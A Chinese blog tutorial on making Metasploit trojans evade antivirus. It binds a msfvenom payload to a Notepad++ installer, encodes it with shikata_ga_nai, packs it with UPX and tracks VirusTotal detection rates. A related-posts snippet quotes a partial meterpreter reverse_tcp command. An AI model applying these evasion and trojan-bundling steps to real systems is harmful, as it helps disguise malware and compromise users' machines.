Kali渗透-MSF木马免杀技术

前言
免杀技术全称为反杀毒技术 Anti-Virus 简称“免杀”，它指的是一种能使病毒木马免于被杀毒软件查杀的技术。由于免杀技术的涉猎面非常广，其中包含反汇编、逆向工程、系统漏洞等技术，内容基本上都是修改病毒、木马的内容改变特征码，从而躲避了杀毒软件的查杀。

裸奔木马
1、在 Kali 中直接使用 Msfvenom 生成木马文件，不做任何免杀处理，如下图所示：
2、在 Kali 开启 Apache 服务，同一局域网内的 Win 10 物理主机访问木马文件，尝试下载：
3、结果 Win 10 物理主机的火绒安全软件自动识别木马，并自动将其移除至病毒隔离区：
4、手动从病毒隔离区移出木马QQ.exe，上传至腾讯哈勃分析系统进行在线病毒识别分析，结果只是“轻度风险”(Emmm……我只能说腾讯你跟病毒是亲家么)如下：
5、此时再用火绒安全对木马文件进行杀毒扫描，来看看其扫描分析结果：

显然，单纯依靠单独一个病毒引擎对风险文件进行识别不太可靠，下面介绍一款在线的多引擎病毒识别工具。

在线杀毒
VirusTotal，是一个提供免费的可疑文件分析服务的网站。2004年6月由创始人Hispasec Sistemas创立。它与传统杀毒软件的不同之处是它通过多种反病毒引擎(包含360、腾讯、微软、赛门铁克等)扫描文件，使用多种反病毒引擎对您所上传的文件进行检测, 以判断文件是否被病毒, 蠕虫, 木马, 以及各类恶意软件感染。这样大大减少了杀毒软件误杀或未检出病毒的几率，其检测率优于使用单一产品。

1、VirusTotal 的扫描页面如下所示：

2、来看看 VirusTotal 对以上未经免杀处理的木马的扫描结果，多个病毒引擎一致将其识别为病毒文件，高达56/70的病毒引擎识别比例：
3、同时还可以进一步查看该病毒文件的行为分析结果：

VirusTotal的反病毒引擎已经多达40种以上，但是也不能保证该网站扫描通过的文件就彻底无害，毕竟道高一尺，魔高一丈。事实上，没有任何一款软件可以提供100%的病毒和恶意软件检测率，杀毒软件所做的就是最大限度的避免用户受到侵害。该网站支持电子邮件或直接上传的两种方式分析文件。此外，VirusTotal每15分钟更新一次病毒资料库，可以实时提供最新的反病毒引擎以检测出大部分可能的威胁。

MSF编码
在 Meatsploit 框架下免杀的方式之一就是使用MSF编码器。其功能是对攻击载荷文件进行重新的排列编码，改变可执行文件中的代码形状，避免被杀软认出。MSF 编码器可以将原可执行程序重新编码，生成一个新的二进制文件，这个文件运行以后，MSF 编码器会将原始程序解码到内存中并执行。

1、在kali终端输入msfvenom -l encoders列出所有可用编码格式：
2、在 Kali 中下载 Notepad 软件的安装包，用于后面将木马程序捆绑到该程序上面，以便于木马的感染和传播：
【注意】Meatsploit 自带了用于捆绑木马的程序模板，其位置在data/templates/template.exe，虽然这个模板经常会更新，但是其仍是各大反病毒木马厂商的关注重点。为了更好地实现免杀，此处自主选择一个待捆绑程序。

3、使用以下命令生成 Windows环境下的木马、并捆绑到npp.7.8.5.installer.exe文件上，同时对木马文件进行x86/shikata_ga_nai编码方式的免杀处理：
解释下其中的部分参数的含义：

参数   备注
-e   指定编码方式对攻击载荷进行重新编码
-x   指定木马捆绑在哪个可执行程序模版上
-i   指定对目标进行编码的次数，多次编码理论上来讲有助于免杀
-f   指定MSF编码器输出的程序的格式
-o   指定处理完毕后的文件输出路径
4、将木马文件传输给 Win 7虚拟机：
5、在 Kali 攻击机运行 MSF 进入木马监听状态，然后运行 Win 7中的木马文件(原安装程序已损坏，无法正常安装)，即可成功获得 Shell ，如下图所示：

6、此时在线对该木马文件进行查杀，VirusTotal 的检测结果如下：
42/71的病毒引擎识别比例，比原生的裸奔木马56/70的识别比例要低一些，其中可以看到腾讯、赛门铁克、百度等知名杀毒引擎也未将其识别：

UPX加壳
upx 打包器的原理非常简单，就是将可执行文件中的代码和数据进行压缩，然后将解压缩用的代码附加在前面，运行的时候先将原本的可执行数据解压出来，然后再运行解压缩后的数据。打包器的本质目的是反调试，防止逆向工程，而这里使用打包器的目的是为了改变后门程序的特征码。

1、Kali 内置了 upx 工具，执行 upx 命令可查看简略的参数介绍：

2、执行以下命令，对刚才生成的木马文件进行加壳处理：

3、将加壳后的木马传输给 Win 7主机后执行，Kali可进行正常的连接和监听：
4、使用 VirusTotal 对当前木马文件进行病毒检测，结果如下：

33/72的病毒引擎识别比例，比单纯经过 MSF 编码处理的的木马文件41/71的识别比例低。

其他免杀
在Github上还有几个常见的用于木马免杀的工具，如：Shellter、Veil、Avet、Venom等，经实践目前免杀效果一般，还不如上面33/72的免杀效果，大概是其免杀技术已被安全厂商盯上并已做出对应检测技术，故此处不做介绍了。如有兴趣可参考某大佬一篇博文：【免杀测试】Kali之Metasploit几款工具免杀练习。

总结
道高一尺，魔高一丈。杀毒软件的更新是非常快的，这里给出的方法和过程在今天还是可行的。但过了几个月之后，免杀技术就有可能出现重大的变化和更新。免杀技术需要不断地磨练与实践，才能在实战中提高成功率。

Kali渗透-MSF木马免杀技术相关推荐

渗透测试-木马免杀的几种方式
木马免杀的几种方式文章目录木马免杀的几种方式前言 1.裸奔马的尝试 2.部署一下kali上的apache服务,令目标机器能够访问下载我们生成的木马 2.1.kali中是自带有apache的,启动 ...
Metasploit的简单木马免杀技术及后渗透面临的问题
一. 配置ngrok准备内网穿透内网穿透的必要性和原理就不用说了,直接说操作.首先到ngrok官网去注册一个号,国内也有一个sunny ngrok,但是我用了几次全失败了,所以推荐国外的,网址是:h ...
【网络安全】渗透测试之木马免杀
博主昵称:跳楼梯企鹅博主主页面链接:博主主页传送门博主专栏页面连接:
木马免杀原理及方法（超全）
灰鸽子免杀概况免杀意为免除被杀毒软件杀掉的软件. 灰鸽子免杀简介:本工具为纯绿色工具,软件采用独特的查杀技巧可完全查杀灰鸽子全系列(VIP2005.vip2006.免杀处理) 木马,本软件已经过 ...
在一黑客论坛上看见的：360免杀技术介绍
一.ASM汇编这个是最舒服的,用OD打开已经配置好的马,找0区(也可以用TOPO加空段)要很大一片哦!右击,选择"二进制"→"编辑",在ASCII中输入 &q ...
Kali木马免杀，权限提升（kali本地木马免杀）
由于现在版本的木马查杀工具更新之快,木马在计算机上基本是裸奔的,再好的免杀技术也逃不过工具的查杀,下面是我研究很久的本地木马免杀,基本都是网上的百度总结,把可以是实现免杀的木马生成进行了总结. 免杀成 ...
免杀技术以及木马处理
免杀如果需要深入了解相关知识补充:破解.二进制.逆向工程本次用到的病毒绕过检测网站: virustotal.com/gui/ 杀毒软件原理: 1.扫描技术: 扫描压缩包:对压缩包内容进 ...
msf之进阶免杀技术,无视360
大家好!我是阿杰,今天我写一篇关于msf免杀技术的文章,如果你喜欢请为我打call,我会一直写下去. 首先我们需要: 说明:python监听虽然可以绕过360,但仅限于安装了python的目标,这是具 ...
Atitit.木马病毒免杀技术 360免杀杀毒软件免杀原理与原则 attilax 总结...
Atitit.木马病毒免杀技术 360免杀杀毒软件免杀原理与原则 attilax 总结 1. ,免杀技术的用途2 1.1. 病毒木马的编写2 1.2. 软件保护所用的加密产品(比如壳)中,有 ...
MSF编码+VS编译木马免杀
MSF编码+VS编译木马免杀 msfvenom -p windows/meterpreter/reverse_tcp -a x86 --platform LHOST=XXX LPORT=XXX -e ...

Kali渗透-MSF木马免杀技术

Kali渗透-MSF木马免杀技术相关推荐

最新文章

热门文章